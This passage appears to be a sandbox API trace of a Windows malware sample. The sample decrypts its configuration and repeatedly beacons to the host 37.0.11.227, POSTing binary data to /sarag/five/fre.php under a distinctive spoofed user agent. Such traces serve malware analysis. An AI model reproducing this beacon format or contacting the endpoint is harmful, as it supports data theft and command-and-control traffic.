[0184.052] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0184.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0184.053] GetProcessHeap () returned 0x690000 [0184.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.054] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a97d0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0184.054] GetProcessHeap () returned 0x690000 [0184.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0184.054] socket (af=2, type=1, protocol=6) returned 0x314 [0184.054] connect (s=0x314, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0184.083] FreeAddrInfoW (pAddrInfo=0x6a97d0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0184.083] GetProcessHeap () returned 0x690000 [0184.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0184.083] GetProcessHeap () returned 0x690000 [0184.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0184.084] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.085] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.085] GetProcessHeap () returned 0x690000 [0184.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0184.085] GetProcessHeap () returned 0x690000 [0184.086] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.086] GetProcessHeap () returned 0x690000 [0184.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0184.086] GetProcessHeap () returned 0x690000 [0184.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0184.087] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.088] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.088] GetProcessHeap () returned 0x690000 [0184.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0184.088] GetProcessHeap () returned 0x690000 [0184.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.089] send (s=0x314, buf=0x6abd08*, len=242, flags=0) returned 242 [0184.089] send (s=0x314, buf=0x6aba40*, len=159, flags=0) returned 159 [0184.089] GetProcessHeap () returned 0x690000 [0184.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0184.089] recv (in: s=0x314, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0184.176] GetProcessHeap () returned 0x690000 [0184.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.179] GetProcessHeap () returned 0x690000 [0184.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0184.181] GetProcessHeap () returned 0x690000 [0184.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0184.182] GetProcessHeap () returned 0x690000 [0184.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0184.182] closesocket (s=0x314) returned 0 [0184.183] GetProcessHeap () returned 0x690000 [0184.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0184.183] GetProcessHeap () returned 0x690000 [0184.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.183] GetProcessHeap () returned 0x690000 [0184.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.183] GetProcessHeap () returned 0x690000 [0184.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x154) returned 0x314 [0184.191] Sleep (dwMilliseconds=0xea60) [0184.192] GetProcessHeap () returned 0x690000 [0184.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0184.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0184.211] GetProcessHeap () returned 0x690000 [0184.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0184.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.213] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0184.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.214] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.215] GetProcessHeap () returned 0x690000 [0184.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0184.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.220] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0184.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.222] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0184.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.223] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0184.223] GetProcessHeap () returned 0x690000 [0184.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.224] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.226] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.227] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.228] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.228] GetProcessHeap () returned 0x690000 [0184.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.228] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.228] GetProcessHeap () returned 0x690000 [0184.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.229] GetProcessHeap () returned 0x690000 [0184.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.229] GetProcessHeap () returned 0x690000 [0184.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.229] GetProcessHeap () returned 0x690000 [0184.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0184.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.230] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0184.244] GetProcessHeap () returned 0x690000 [0184.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0184.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.246] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0184.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.247] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.248] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.248] GetProcessHeap () returned 0x690000 [0184.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0184.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.250] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0184.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.251] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0184.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.253] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0184.253] GetProcessHeap () returned 0x690000 [0184.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.255] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0184.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.256] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0184.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.257] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0184.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.258] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0184.258] GetProcessHeap () returned 0x690000 [0184.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.258] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9d20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0184.258] GetProcessHeap () returned 0x690000 [0184.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0184.258] socket (af=2, type=1, protocol=6) returned 0x318 [0184.259] connect (s=0x318, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0184.294] FreeAddrInfoW (pAddrInfo=0x6a9d20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0184.294] GetProcessHeap () returned 0x690000 [0184.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0184.295] GetProcessHeap () returned 0x690000 [0184.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0184.295] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.296] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.296] GetProcessHeap () returned 0x690000 [0184.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0184.296] GetProcessHeap () returned 0x690000 [0184.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.297] GetProcessHeap () returned 0x690000 [0184.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0184.297] GetProcessHeap () returned 0x690000 [0184.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0184.298] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.298] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.298] GetProcessHeap () returned 0x690000 [0184.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0184.298] GetProcessHeap () returned 0x690000 [0184.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.299] send (s=0x318, buf=0x6abd08*, len=242, flags=0) returned 242 [0184.300] send (s=0x318, buf=0x6aba40*, len=159, flags=0) returned 159 [0184.301] GetProcessHeap () returned 0x690000 [0184.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0184.301] recv (in: s=0x318, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0184.372] GetProcessHeap () returned 0x690000 [0184.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.373] GetProcessHeap () returned 0x690000 [0184.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.374] GetProcessHeap () returned 0x690000 [0184.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0184.374] GetProcessHeap () returned 0x690000 [0184.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0184.375] closesocket (s=0x318) returned 0 [0184.375] GetProcessHeap () returned 0x690000 [0184.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0184.375] GetProcessHeap () returned 0x690000 [0184.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.376] GetProcessHeap () returned 0x690000 [0184.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.376] GetProcessHeap () returned 0x690000 [0184.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x844) returned 0x318 [0184.380] Sleep (dwMilliseconds=0xea60) [0184.381] GetProcessHeap () returned 0x690000 [0184.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0184.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.392] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0184.399] GetProcessHeap () returned 0x690000 [0184.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0184.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.400] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0184.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.402] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.403] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.403] GetProcessHeap () returned 0x690000 [0184.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0184.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.405] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0184.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.406] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0184.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.407] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0184.407] GetProcessHeap () returned 0x690000 [0184.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0184.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.412] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.413] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.414] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.414] GetProcessHeap () returned 0x690000 [0184.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0184.414] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.415] GetProcessHeap () returned 0x690000 [0184.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0184.415] GetProcessHeap () returned 0x690000 [0184.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.416] GetProcessHeap () returned 0x690000 [0184.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.416] GetProcessHeap () returned 0x690000 [0184.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0184.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0184.431] GetProcessHeap () returned 0x690000 [0184.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0184.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.433] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0184.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.434] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.435] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.435] GetProcessHeap () returned 0x690000 [0184.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0184.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.437] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0184.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.438] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0184.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.439] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0184.439] GetProcessHeap () returned 0x690000 [0184.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.440] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0184.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.441] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0184.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.442] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0184.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.443] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0184.443] GetProcessHeap () returned 0x690000 [0184.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0184.443] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9f28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0184.443] GetProcessHeap () returned 0x690000 [0184.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0184.443] socket (af=2, type=1, protocol=6) returned 0x31c [0184.444] connect (s=0x31c, name=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0184.471] FreeAddrInfoW (pAddrInfo=0x6a9f28*(ai_flags=4, 